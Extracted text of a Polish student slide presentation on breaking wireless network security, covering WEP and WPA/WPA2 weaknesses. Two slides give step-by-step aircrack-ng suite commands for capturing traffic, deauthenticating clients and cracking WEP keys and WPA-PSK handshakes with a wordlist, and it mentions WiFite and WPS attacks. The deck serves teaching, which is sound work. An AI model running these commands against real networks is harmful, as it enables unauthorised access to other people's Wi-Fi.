Łamanie
zabezpieczeń
sieci
bezprzewodowyc
h
Adrian Kabała
Krakowska Akademia
im. Andrzeja Frycza Modrzewskiego
Kierunek: Informatyka i ekonometria
Promotor: prof. zw. Dr hab. Tadeusza Grabińskiego
Bezpieczeństwo w sieci
Internet
jest bardzo ważnym aspektem użytkowania
Internetu.
Zagrożenia płynące z Internetu – metody ataków:
Ataki z zewnątrz sieci lokalnej
(DoS, wirusy, XSS,
penetracja poprzez sieć bezprzewodową)
Ataki z wnętrza sieci lokalnej
(ARP, RARP)
Klasy ataków:
Ataki pasywne – podsłuchiwanie
Ataki aktywne – modyfikacja i spreparowanie danych
Ochrona poprzez Firewall
Blokowanie dostępu do usług i komponentów dla osób,
które nie powinny mieć do nich dostępu
Ochrona systemów przed atakami na dziurawe
oprogramowanie sieciowe
Ochrona dziurawych systemów operacyjnych
Zapobieganie podsłuchiwaniu oraz wyciekom informacji
z sieci wew.
Ochrona przed fałszowaniem adresów IP
Wydzielanie fragmentów sieci o zróżnicowanym
poziomie bezpieczeństwa
Typy firewalli
a)
Zapory lokalne
b)
Zapory filtrujące
c)
Zapory proxy
Bezpieczeństwo sieci WEP
WEP
(1997r.)
2001 – Pierwszy artukuł FMS.
2002 – Udoskonalenie o kolejne bajty
obliczeń
2004 – KoreK
Algorytm RC4
Zarządzanie kluczami KSA
Produkowanie strumienia szyfrującego
PRGA
Uwierzytelnianie w WEP
1. Uwierzytelnianie otwarte (OSA)
2. Uwierzytelnianie kluczem współdzielonym (SKA)
3. Weryfikacja MAC
Słabość WEP
Tylko 16777216 różnych możliwych wartości
IV
Obecność słabych wartości IV
Inicjalizacja resetuje sekwencje wektora IV
Chop-Chop
Atak na sieć WEP
airodump-ng wlan0
airodump-ng -c 1 –bssid
00:16:B6:D9:58:71 wlan0 –w nazwa_pliku
aireplay-ng -0 1 –a 00:16:b6:d9:58:71 –c
00:60:b3:d4:51:f3 wlan0
aircrack-ng /root/testka/test-01.cap
Hasło: A1:A2:A3:A4:A5
Bezpieczeństwo sieci WPA i
WPA2
WPA (2003 r.) WPA2(2004r.)
•Personal (TKIP, CCMP)
•Enterprise - Radius
Zarządzanie
kluczami i
uwierzytelnian
ie
PMK – klucz główny
PTK – dla TKIP: 2 x EAPOL, TEK,
MIC.
PTK – dla CCMP: – 2 x EAPOL,
TK
Słabość WPA i WPA2
PMK = PBKDF2 (hasło, SSID, ssidLength, 4096,
256)
PTK = HMAC, 2x MAC, 2x ID Nonces
Tablice tęczowe
• Szybkość
• Oszczędność mocy obliczeniowej
• Duża ilość haseł
• Słaba dostępność
Atak na sieć WPA/WPA2-PSK
1.
Backtrack
2.
airodump-ng mon0
3.
airodump-ng –c 6 -–bbsid 00:1E:E5:99:08:78
–w /root/armagedon mon0
4.
aireplay-ng –0 1 -a 00:1E:E5:99:08:78 –c
2:E0:2C:5E:4F:DB mon0
5.
aircrack-ng –w słownik.txt –b
00:1E:E5:99:08:78 /root/Armagedon-01.cap
WiFite – łatwiej się nie da.
Atak Wi-Fi Protected Setup
Skrypt pobierający hasła
Dziękuję za uwagę